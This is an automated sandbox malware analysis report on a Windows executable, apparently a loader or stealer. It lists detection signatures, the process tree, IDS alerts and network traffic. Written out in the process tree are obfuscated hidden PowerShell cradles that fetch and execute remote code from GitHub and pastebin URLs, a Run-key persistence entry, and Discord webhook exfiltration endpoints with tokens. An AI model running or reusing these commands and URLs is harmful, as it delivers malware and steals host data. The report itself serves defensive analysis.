
Windows Analysis Report
OSLdZanXNc.exe

Overview

General Information

Sample name: OSLdZanXNc.exe (renamed because the original name is a hash value)
Original sample name: a40d9f817045b1192d6cfc6a2defd4289d0f8e67c1ad147a7e51d50be8448203.exe
Analysis ID: 1534108
MD5: 98ff253f6f854df7b7f6794a2761dbd1
SHA1: 246ae6060c76a6751b6ba2d9ca0de18e298b5e26
SHA256: a40d9f817045b1192d6cfc6a2defd4289d0f8e67c1ad147a7e51d50be8448203
Tags: exe, Neth3N, user-JAMESWT_MHT

Detection

Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Powershell creates an autostart link
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to open files direct via NTFS file id
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • OSLdZanXNc.exe (PID: 7512 cmdline: "C:\Users\user\Desktop\OSLdZanXNc.exe" MD5: 98FF253F6F854DF7B7F6794A2761DBD1)
    • conhost.exe (PID: 7520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7564 cmdline: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)} MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 7736 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing) MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 8124 cmdline: "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
  • forfiles.exe (PID: 8068 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 8080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8148 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 7328 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • forfiles.exe (PID: 6592 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 2696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2596 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 7368 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
No configs have been found
Source: Process Memory Space: powershell.exe PID: 7328
Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC
Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Author: ditekSHen
Strings:
  • 0x4d898:$b1: ::WriteAllBytes(
  • 0x912cf:$b1: ::WriteAllBytes(
  • 0x376d1:$s1: -join
  • 0x3e698:$s1: -join
  • 0x112b23:$s1: -join
  • 0x113283:$s1: -join
  • 0x3a1d:$s3: reverse
  • 0xda53:$s3: reverse
  • 0x59d2b:$s3: reverse
  • 0x609ad:$s3: reverse
  • 0x62840:$s3: reverse
  • 0x6d86f:$s3: reverse
  • 0x742b0:$s3: reverse
  • 0x7f0fd:$s3: reverse
  • 0x140fcd:$s3: reverse
  • 0x1412bb:$s3: reverse
  • 0x1419d5:$s3: reverse
  • 0x14218e:$s3: reverse
  • 0x1490cc:$s3: reverse
  • 0x1494e6:$s3: reverse
  • 0x14a06e:$s3: reverse
Source: amsi64_7328.amsi.csv
Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC
Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Author: ditekSHen
Strings:
  • 0x9a92:$b1: ::WriteAllBytes(
  • 0x8197:$s1: -join
  • 0x1943:$s4: +=
  • 0x1a05:$s4: +=
  • 0x5c2c:$s4: +=
  • 0x7d49:$s4: +=
  • 0x8033:$s4: +=
  • 0x8179:$s4: +=
  • 0xc1bc:$s4: +=
  • 0xc23c:$s4: +=
  • 0xc302:$s4: +=
  • 0xc382:$s4: +=
  • 0xc558:$s4: +=
  • 0xc5dc:$s4: +=
  • 0x9b2c:$e4: Get-WmiObject
  • 0x9bce:$e4: Get-WmiObject
  • 0xa6a5:$e4: Get-WmiObject
  • 0xa894:$e4: Get-Process
  • 0xa8ec:$e4: Start-Process
Source: amsi64_7368.amsi.csv
Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC
Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Author: ditekSHen
Strings:
  • 0x9a92:$b1: ::WriteAllBytes(
  • 0x8197:$s1: -join
  • 0x1943:$s4: +=
  • 0x1a05:$s4: +=
  • 0x5c2c:$s4: +=
  • 0x7d49:$s4: +=
  • 0x8033:$s4: +=
  • 0x8179:$s4: +=
  • 0xc1bc:$s4: +=
  • 0xc23c:$s4: +=
  • 0xc302:$s4: +=
  • 0xc382:$s4: +=
  • 0xc558:$s4: +=
  • 0xc5dc:$s4: +=
  • 0x9b2c:$e4: Get-WmiObject
  • 0x9bce:$e4: Get-WmiObject
  • 0xa6a5:$e4: Get-WmiObject
  • 0xa894:$e4: Get-Process
  • 0xa8ec:$e4: Start-Process

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}, CommandLine: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\OSLdZanXNc.exe", ParentImage: C:\Users\user\Desktop\OSLdZanXNc.exe, ParentProcessId: 7512, ParentProcessName: OSLdZanXNc.exe, ProcessCommandLine: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}, ProcessId: 7564, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix); Data: Command: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}, CommandLine: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\OSLdZanXNc.exe", ParentImage: C:\Users\user\Desktop\OSLdZanXNc.exe, ParentProcessId: 7512, ParentProcessName: OSLdZanXNc.exe, ProcessCommandLine: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}, ProcessId: 7564, ProcessName: powershell.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7736, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive File Sync
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}, CommandLine: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\OSLdZanXNc.exe", ParentImage: C:\Users\user\Desktop\OSLdZanXNc.exe, ParentProcessId: 7512, ParentProcessName: OSLdZanXNc.exe, ProcessCommandLine: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}, ProcessId: 7564, ProcessName: powershell.exe
Source: Process started; Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger; Data: Command: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}, CommandLine: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\OSLdZanXNc.exe", ParentImage: C:\Users\user\Desktop\OSLdZanXNc.exe, ParentProcessId: 7512, ParentProcessName: OSLdZanXNc.exe, ProcessCommandLine: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}, ProcessId: 7564, ProcessName: powershell.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}, CommandLine: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\OSLdZanXNc.exe", ParentImage: C:\Users\user\Desktop\OSLdZanXNc.exe, ParentProcessId: 7512, ParentProcessName: OSLdZanXNc.exe, ProcessCommandLine: powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}, ProcessId: 7564, ProcessName: powershell.exe

Suricata IDS alerts:

Timestamp                        SID      Severity  Classtype                      Source IP    Source Port  Destination IP   Destination Port  Protocol
2024-10-15T16:01:34.007990+0200  2857659  1         A Network Trojan was detected  192.168.2.9  49943        162.159.137.232  443               TCP
2024-10-15T16:01:42.173236+0200  2857659  1         A Network Trojan was detected  192.168.2.9  49984        162.159.137.232  443               TCP
2024-10-15T16:01:20.844371+0200  2857658  1         A Network Trojan was detected  192.168.2.9  49868        162.159.137.232  443               TCP


AV Detection

Source: Submitted Sample; Integrated Neural Analysis Model: Matched 99.1% probability
Source: unknown; HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.9:49763 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.9:49856 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.9:49869 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.9:49868 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.9:49905 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.9:49916 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.9:49943 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.9:49984 version: TLS 1.2
Source: OSLdZanXNc.exe; Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb2 source: powershell.exe, 0000000B.00000002.3244005640.000001E8500A1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.3244005640.000001E850070000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 0000000B.00000002.3244005640.000001E850102000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\adminalt\Autodesk.AutoCAD.2023.x64.Portable\x64\Release\PePacker.pdb source: OSLdZanXNc.exe
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 0000000B.00000002.3244005640.000001E8500A1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\System.Management.Automation.pdb!F source: powershell.exe, 0000000B.00000002.3244005640.000001E850102000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000B.00000002.3244005640.000001E850102000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdbt source: powershell.exe, 0000000B.00000002.3244005640.000001E8500A1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 0000000B.00000002.3244005640.000001E850070000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000B.00000002.3244005640.000001E8500A1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.3244005640.000001E850102000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 0000000B.00000002.3244005640.000001E8500A1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbX$ source: powershell.exe, 0000000B.00000002.3244005640.000001E850070000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbIN source: powershell.exe, 0000000B.00000002.3244005640.000001E850102000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\adminalt\Autodesk.AutoCAD.2023.x64.Portable\x64\Release\PePacker.pdb) source: OSLdZanXNc.exe
Source: Binary string: \??\C:\Windows\mscorlib.pdb[ source: powershell.exe, 0000000B.00000002.3244005640.000001E850102000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000B.00000002.3244005640.000001E8500A1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb( source: powershell.exe, 0000000B.00000002.3244005640.000001E850070000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbn source: powershell.exe, 0000000B.00000002.3244005640.000001E8500A1000.00000004.00000020.00020000.00000000.sdmp

Networking

Source: Network traffic; Suricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.9:49984 -> 162.159.137.232:443
Source: Network traffic; Suricata IDS: 2857658 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Registration : 192.168.2.9:49868 -> 162.159.137.232:443
Source: Network traffic; Suricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.9:49943 -> 162.159.137.232:443
Source: unknown; DNS query: name: pastebin.com
Source: Joe Sandbox View; IP Address: 104.20.3.235
Source: Joe Sandbox View; IP Address: 104.20.3.235
Source: Joe Sandbox View; IP Address: 162.159.137.232
Source: Joe Sandbox View; ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View; ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View; ASN Name: FASTLYUS
Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic; HTTP traffic detected (observed 4 times): GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected (observed 8 times): GET /raw/sA04Mwk2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: pastebin.com | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected (observed 8 times): GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected (observed once): POST /api/webhooks/1295171900019966004/KRGDAVzqdqMZILdh_WVWyqLwT2_aVjXOXnoEnaoZ5xZY_kNOmMNm2yrdQTKMOzXSXWSI HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Content-Type: application/json | Host: discord.com | Content-Length: 215 | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected (observed 2 times): POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Content-Type: application/json | Host: discord.com | Content-Length: 296 | Connection: Keep-Alive
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1 (observed 3 times)
Source: global traffic; DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic; DNS traffic detected: DNS query: pastebin.com
Source: global traffic; DNS traffic detected: DNS query: discord.com
Source: unknown; HTTP traffic detected: POST /api/webhooks/1295171900019966004/KRGDAVzqdqMZILdh_WVWyqLwT2_aVjXOXnoEnaoZ5xZY_kNOmMNm2yrdQTKMOzXSXWSI HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Content-Type: application/json | Host: discord.com | Content-Length: 215 | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 15 Oct 2024 14:01:20 GMT | Content-Type: application/json | Content-Length: 45 | Connection: close | Cache-Control: public, max-age=3600, s-maxage=3600 | strict-transport-security: max-age=31536000; includeSubDomains; preload | x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f | x-ratelimit-limit: 5 | x-ratelimit-remaining: 4 | x-ratelimit-reset: 1729000882 | x-ratelimit-reset-after: 1 | via: 1.1 google | alt-svc: h3=":443"; ma=86400 | CF-Cache-Status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=58B81X6XqTUALdaBPuB4CfjF62tBh2T0Sr80DNIqWF0vD33om5w65U%2B1ZoHFRUyaIQLxuxnEnHXXFUzgKDsk3wi%2FcXAmwm483Ymcd3W5z8wNY0GD4JvymBTg3vnt"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | X-Content-Type-Options: nosniff | Set-Cookie: __cfruid=c2021c9f6a79cf8578cacfe5f6ac2dc95557f6e5-1729000880; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None | Content-Security-Policy: frame-ancestors 'none'; default-src 'none' | Set-Cookie: _cfuvid=F0CDxSPHlGiABYxlu8vUvaOxRpKPK93DuSrUk_klzrI-1729000880780-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None | Server: cloudflare | CF-RAY: 8d3057304f4d143f-DFW
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 15 Oct 2024 14:01:33 GMT | Content-Type: application/json | Content-Length: 45 | Connection: close | Cache-Control: public, max-age=3600, s-maxage=3600 | strict-transport-security: max-age=31536000; includeSubDomains; preload | x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f | x-ratelimit-limit: 5 | x-ratelimit-remaining: 4 | x-ratelimit-reset: 1729000895 | x-ratelimit-reset-after: 1 | via: 1.1 google | alt-svc: h3=":443"; ma=86400 | CF-Cache-Status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ff0O17UB3Ov3KTZmhUISKgZci0UZGNxr8qZ2cdsp%2BKOtY1dKXzn4%2F8MfuzKP4FZAf9cRxS9fA5hleR5PcSqyo83FD6mG%2FNLGtrsuNdDyDiYP6m2NnO7fzKzs2SIV"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | X-Content-Type-Options: nosniff | Set-Cookie: __cfruid=d9dc4083431ce817dfbc35ac79b778c84967b3e6-1729000893; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None | Content-Security-Policy: frame-ancestors 'none'; default-src 'none' | Set-Cookie: _cfuvid=T8QA7EP1FFG0VuusfKDGu21WWqvSlHvJJ.YAY7ZCz3k-1729000893944-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None | Server: cloudflare | CF-RAY: 8d30578259c74761-DFW
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 15 Oct 2024 14:01:42 GMT | Content-Type: application/json | Content-Length: 45 | Connection: close | Cache-Control: public, max-age=3600, s-maxage=3600 | strict-transport-security: max-age=31536000; includeSubDomains; preload | x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f | x-ratelimit-limit: 5 | x-ratelimit-remaining: 4 | x-ratelimit-reset: 1729000903 | x-ratelimit-reset-after: 1 | via: 1.1 google | alt-svc: h3=":443"; ma=86400 | CF-Cache-Status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1WJRR4H3K2KLLgXbDWi7%2BRVDgprYviDKr3%2BaAafST2985oEVwmhp91vSVx1TAAfQpa8oI7eXDu46chZ%2FmIKZI1DmY%2FkZnf027A7xgT4J0510P%2FMSwyWeaRV1UEpF"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | X-Content-Type-Options: nosniff | Set-Cookie: __cfruid=fbd1557a38fcd621c012b0decde5f8af2ef4fff2-1729000902; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None | Content-Security-Policy: frame-ancestors 'none'; default-src 'none' | Set-Cookie: _cfuvid=Ezu6upK7b7Q.YbiuCSJWjKSjGNCEhRlEZ00le.X7ekw-1729000902110-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None | Server: cloudflare | CF-RAY: 8d3057b57f8f475c-DFW
Source: powershell.exe, 0000000B.00000002.3233396001.000001E839107000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://discord.com
Source: powershell.exe, 0000000B.00000002.3233396001.000001E8386D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3233396001.000001E8386B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3233396001.000001E838166000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pastebin.com
Source: powershell.exe, 0000000B.00000002.3233396001.000001E838166000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pastebin.com/raw/sA04Mwk2
Source: powershell.exe, 0000000B.00000002.3233396001.000001E838753000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3233396001.000001E838784000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://raw.githubusercontent.com
Source: powershell.exe, 0000000B.00000002.3233396001.000001E838753000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Source: powershell.exe, 0000000B.00000002.3233396001.000001E837CA5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000B.00000002.3233396001.000001E837CA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3233396001.000001E837CBC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000B.00000002.3233396001.000001E839107000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com
